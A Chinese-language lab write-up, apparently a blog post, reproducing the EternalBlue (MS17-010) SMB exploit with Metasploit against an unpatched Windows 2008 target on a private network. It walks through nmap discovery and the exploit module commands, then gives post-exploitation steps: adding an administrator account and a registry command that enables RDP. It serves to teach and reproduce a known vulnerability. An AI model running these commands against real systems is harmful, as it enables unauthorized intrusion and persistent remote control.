一、漏洞简介
1、永恒之蓝介绍:
永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。据统计,全球100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。

2、漏洞原理:
永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。只要用户主机开机联网,即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。

3、影响版本:
目前已知受影响的 Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

二、漏洞复现
复现环境:
攻击机:Linux kali(IP:192.168.6.128)

靶机:Windows 2008 (IP:192.168.6.134)

实验条件:两台机子可以相互ping通,并且靶机(无补丁)开启了445端口,防火墙必须是关闭的!

复现过程:
1、主机发现:
登录 kali linux,用 nmap 探测本网段存活主机

nmap -sP 192.168.6.0/24

探测端口开放情况 nmap 192.168.6.134

可以看到,靶机的445端口是开放的,而永恒之蓝利用的就是445端口的SMB服务,操作系统溢出漏洞。

2、使用MSF的永恒之蓝漏洞模块(这里使用的finalshell)
打开MSF:msfconsole

搜索 ms17_010 代码:search ms17010

auxiliary/scanner/smb/smb_ms17_010 是永恒之蓝扫描模块, exploit/windows/smb/ms17_010_eternalblue 是永恒之蓝攻击模块。

3、使用ms17-010攻击模块,对靶机进行攻击
使用模块:

use exploit/windows/smb/ms17_010_eternalblue
设置攻击目标IP

set rhosts 192.168.6.134
可以使用 show options 命令查看设置选项

exploit(执行攻击,本人用run攻击有时候会不成功,建议使用exploit)

攻击成功(获得shell,可执行命令)

基本漏洞复现完成。

后续可执行操作(攻防使用)

添加用户net localgroup administrators 用户/add

开启3389端口开始远程监控操作

查看3389端口状态:netstat -ano

开启3389(REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f)

远程桌面连接靶机rdesktop 192.168.6.134:3389

使用创建用户登陆

后续操作只说明操作,具体还是看个人需求,本人不做实验截图。

漏洞复现之(MS17-010)相关推荐

  1. 成功爬取CVE-2019-9766漏洞复现【CSDN】【1】

    代码: import requests import bs4 from bs4 import BeautifulSoup import ress = '' headers = {'user-agent ...

  2. docker逃逸漏洞复现 cve-2019-5736

    0x01 概述 2019年2月11日,runC的维护团队报告了一个新发现的漏洞,该漏洞最初由Adam Iwaniuk和Borys Poplawski发现.该漏洞编号为CVE-2019-5736,漏洞影 ...

  3. php 远程代码执行漏洞复现 cve-2019-11043

    漏洞描述 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码. 向Nginx + PHP-FPM的服务 ...

  4. java struts2 漏洞复现合集

    目录 一.S2-001复现 二.S2-005复现 三.S2-007复现 四.S2-008复现 五.S2-009复现 六.S2-012复现 七.S2-013复现 八.S2-015复现 九.S2-016复 ...

  5. Jenkins cve-2016-0792 漏洞复现 Xstream 反序列化漏洞

    环境搭建 首先需要安装jenkins,这里使用的是1.642.1版本,其他版本可以自行下载,在官网和百度一开始都是没找到的,包括看了其他人的分析,但是都没有找到环境搭建,大部分是直接复现和poc分析 ...

  6. winrar远程代码执行漏洞复现(cve-2018-20250)

    使用metasploit验证漏洞 1.漏洞影响 WinRAR < 5.70 Beta 1 Bandizip< = 6.2.0.0 好压(2345压缩) < = 5.9.8.10907 ...

  7. Typecho反序列化导致前台 getshell 漏洞复现

    Typecho反序列化导致前台 getshell 漏洞复现 漏洞描述: Typecho是一款快速建博客的程序,外观简洁,应用广泛.这次的漏洞通过install.php安装程序页面的反序列化函数,造成了 ...

  8. Winrar目录穿越漏洞复现

    Winrar目录穿越漏洞复现 1.漏洞概述 WinRAR 是一款功能强大的压缩包管理器,它是档案工具RAR在Windows环境下的图形界面.2019年 2 月 20 日Check Point团队爆出了 ...

  9. android 动画 最顶层_【Android编程实战】StrandHogg漏洞复现及原理分析_Android系统上的维京海盗...

    0x00 StrandHogg漏洞详情 StrandHogg漏洞 CVE编号:暂无 [漏洞危害] 近日,Android平台上发现了一个高危漏洞 该漏洞允许攻击者冒充任意合法应用,诱导受害者授予恶意应用 ...

  10. vc++ 6.0 创建程序快捷方式的一个例子源码_漏洞复现:phpcms v9.6.0任意文件上传漏洞(CVE201814399)...

    文章说明 漏洞复现是为了学习漏洞利用所写,漏洞都是互联网上以流传已久的各种漏洞的利用及原理,用来增强自己见识,培养自己动手能力,有兴趣的朋友可自行搭建环境练习.源码下载连接在文章最后. 漏洞说明 PH ...

最新文章

  1. 使用Python,OpenCV,K-Means聚类查找图像中最主要的颜色
  2. ARM嵌入式开发之JTAG与SWD接口
  3. 吴恩达老师的机器学习和深度学习课程笔记打印版
  4. Android UI之ImageView
  5. (c语言)输入某年某日,判断这一天是这一年的第几天?
  6. oracle二进制转换字母,如何将oracle二进制数据转换为word文本
  7. yii beforeaction 如何赋值全局变量_前端如何进行用户权限管理
  8. 【Pandas】CSV文件读取时手动指定头部
  9. ConnectionString 最简便写法 for MSSQL 2005 EXPRESS
  10. 程序员代码面试指南 算法与数据结构 大厂经典代码面试题
  11. python3 模块调用其他类的方法_python类的函数调用 python如何引用其他模块中类的方法中的变量?...
  12. 重庆大学计算机学院马前,以梦为马,以论为矛
  13. java判断字母是否为元音_Java程序来检查字母是元音还是辅音
  14. Django请求和响应对象
  15. 首师大附中互测题:LJX的校园:入学典礼【C003】
  16. 全国300城市交通违章查询api
  17. 影像组学训练营 第三天(共三天)
  18. 小伙Python爬虫并自制新闻网站,太好玩了
  19. PCIE Feature ------ INTx
  20. 计算机配件名称++太平洋,笔记本电脑配件大全

热门文章

  1. 对抗神经网络学习和实现(GAN)
  2. 串级控制系统的计算机控制原理图,串级PID控制原理
  3. pdf在html中加载不出来,pdf嵌入html解决办法
  4. HTML|按钮和多选框
  5. 一文读懂等保二级和三级有什么区别
  6. biopython安装_Ubuntu中安装Biopython
  7. 老师必备的数学几何绘图软件,赶紧收藏!
  8. go字符串转byte_go语言中int和byte转换方式
  9. 合宙 Air 724UG模组(4G Cat.1通信模组)测试过程
  10. 十大排序算法-桶排序(c语言实现)